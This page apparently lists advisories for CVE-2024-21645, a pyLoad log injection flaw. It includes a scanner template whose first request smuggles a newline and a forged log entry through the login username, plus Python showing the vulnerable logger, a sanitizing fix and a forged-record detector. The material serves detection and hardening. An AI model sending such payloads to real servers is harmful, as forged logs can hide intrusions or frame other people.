| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-21645 | 6 Jan 2024 00:58 | – | circl |
| pyload injection vulnerability | 8 Jan 2024 00:00 | – | cnnvd |
| CVE-2024-21645 | 8 Jan 2024 13:20 | – | cve |
| CVE-2024-21645 pyLoad Log Injection | 8 Jan 2024 13:20 | – | cvelist |
| pyload Log Injection vulnerability | 8 Jan 2024 15:29 | – | github |
| CVE-2024-21645 | 8 Jan 2024 14:15 | – | nvd |
| CVE-2024-21645 pyLoad Log Injection | 8 Jan 2024 13:20 | – | osv |
| GHSA-GHMW-RWH8-6QMR pyload Log Injection vulnerability | 8 Jan 2024 15:29 | – | osv |
| Design/Logic Flaw | 8 Jan 2024 14:15 | – | prion |
| CVE-2024-21645 | 23 May 2025 09:09 | – | redhatcve |
```yaml
id: CVE-2024-21645

info:
  name: pyload - Log Injection
  author: isacaya
  severity: medium
  description: |
    A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    Forged or otherwise corrupted log files can be used to cover an attacker's tracks or even to implicate another party in the commission of a malicious act.
  reference:
    - https://github.com/advisories/GHSA-ghmw-rwh8-6qmr
    - https://nvd.nist.gov/vuln/detail/CVE-2024-21645
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-21645
    cwe-id: CWE-74
    epss-score: 0.24513
    epss-percentile: 0.97613
    cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: pyload
    product: pyload
    shodan-query:
      - "title:\"pyload\""
      - http.title:"login - pyload"
      - http.html:"pyload"
      - http.title:"pyload"
    fofa-query:
      - title="login - pyload"
      - body="pyload"
      - title="pyload"
    google-query:
      - intitle:"login - pyload"
      - intitle:"pyload"
    zoomeye-query: app="pyLoad"
  tags: cve,cve2024,pyload,authenticated,injection,vuln

variables:
  str: "{{rand_base(6)}}"

http:
  - raw:
      # Request 1 (unauthenticated): the username carries a URL-encoded newline (%0a)
      # followed by a fabricated log line, which pyload writes into its log verbatim.
      - |
        POST /login?next={{RootURL}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        do=login&username={{randstr}}\'%0a[1970-01-01 00:00:00] INJECTED {{str}} THIS ENTRY HAS BEEN INJECTED&password=wrong&submit=Login

      # Request 2 (authenticated): log in with real credentials and follow the
      # redirect to /logs so the matcher can confirm the forged entry was stored.
      - |
        POST /login?next={{RootURL}}/logs HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        do=login&username={{username}}&password={{password}}&submit=Login

    redirects: true
    max-redirects: 1
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<td>1970-01-01 00:00:00</td><td class="loglevel">INJECTED</td><td class="logsource">{{str}}</td><td>THIS ENTRY HAS BEEN INJECTED</td>'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cd35a76366714353325a25596798ae645456fdd3e7f0c9d75b1404bc9a361e56022100ca3f6fee85a3875118a9eeff9847bcba31fb59a26eb153a9f25551cab9f478e3:922c64590222798bb761d5b6d8e72950
```

The template needs `-var username=... -var password=...` for the second request; the injection itself in the first request requires no credentials, which is why the description calls the actor unauthenticated while the template is tagged `authenticated` (verification reads the log viewer).
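The template above proves the defect from the outside. The following is an added, self-contained example (not pyLoad's code, and not from the advisory) that shows the underlying mechanism the template exploits and the two controls a practitioner would want: a vulnerable line-oriented logger that writes the template's payload as two records, a hardened variant that escapes control characters before interpolating user input, and a scanner that flags forged records in an existing log. The log line format, the `sanitize` function, the `KNOWN_LEVELS` set and the constructed `PAYLOAD` are assumptions of this example, not pyLoad's format or code.

```python
"""Added example (not pyLoad's code): how a newline in a login username turns one
log record into two, how to neutralise it, and how to spot it after the fact.

Assumptions (illustrative, not taken from pyLoad or the advisory): the log line
format below, the sanitizer, and the set of levels the application emits."""
import re
from datetime import datetime
from typing import Dict, List, Optional

# Record shape used by this example: "[YYYY-mm-dd HH:MM:SS] LEVEL SOURCE MESSAGE"
LINE_RE = re.compile(
    r"^\[(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\] "
    r"(?P<level>[A-Z]+)\s+(?P<source>\S+)\s+(?P<msg>.*)$"
)

# Levels this (assumed) application actually emits; anything else is suspect.
KNOWN_LEVELS = {"DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"}

# Constructed payload mirroring the template's username field after URL decoding:
# "%0a" becomes "\n", so everything after it begins a new physical log line.
PAYLOAD = "bob'\n[1970-01-01 00:00:00] INJECTED abc123 THIS ENTRY HAS BEEN INJECTED"


def format_record(level: str, source: str, msg: str, ts: Optional[datetime] = None) -> str:
    """Render one record. The timestamp is fixed by default so results are deterministic."""
    ts = ts or datetime(2024, 1, 8, 13, 20, 0)
    return f"[{ts:%Y-%m-%d %H:%M:%S}] {level} {source} {msg}"


def log_login_failed_vulnerable(username: str) -> str:
    """The defect class (CWE-74): attacker-controlled text interpolated verbatim."""
    return format_record("WARNING", "login", f"Login failed for user '{username}'")


def sanitize(value: str) -> str:
    """Escape CR, LF and every other C0 control character (plus DEL) so user input
    can neither start a new record nor drive the terminal of whoever tails the log."""
    return re.sub(r"[\x00-\x1f\x7f]", lambda m: "\\x%02x" % ord(m.group()), value)


def log_login_failed_fixed(username: str) -> str:
    """Hardened variant: identical message, but the input is escaped first."""
    return format_record("WARNING", "login", f"Login failed for user '{sanitize(username)}'")


def parse_log(text: str) -> List[Dict[str, str]]:
    """A naive line-oriented reader, like a log viewer or a SIEM collector would use."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def find_suspicious(text: str) -> List[str]:
    """Detection heuristic for a log that was already written: flag a record whose
    level the application never emits, or whose timestamp runs backwards relative
    to the record before it. The template's forged line trips both checks."""
    flagged = []
    last_ts = None
    for rec in parse_log(text):
        ts = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
        reasons = []
        if rec["level"] not in KNOWN_LEVELS:
            reasons.append("unknown level %r" % rec["level"])
        if last_ts is not None and ts < last_ts:
            reasons.append("timestamp earlier than previous record")
        if reasons:
            flagged.append("%s: %s" % (rec["ts"], "; ".join(reasons)))
        last_ts = ts
    return flagged


if __name__ == "__main__":
    vulnerable = log_login_failed_vulnerable(PAYLOAD)
    fixed = log_login_failed_fixed(PAYLOAD)
    print("vulnerable logger wrote %d record(s)" % len(parse_log(vulnerable)))
    print("hardened logger wrote %d record(s)" % len(parse_log(fixed)))
    for finding in find_suspicious(vulnerable):
        print("suspicious:", finding)
```

The escape-on-write approach is preferable to stripping, because the original bytes of the attacker's input survive in the record for investigation; the scanner is only a fallback for logs written before the fix, and a forged line whose timestamp and level are chosen plausibly will evade it, so it complements rather than replaces the sanitizer.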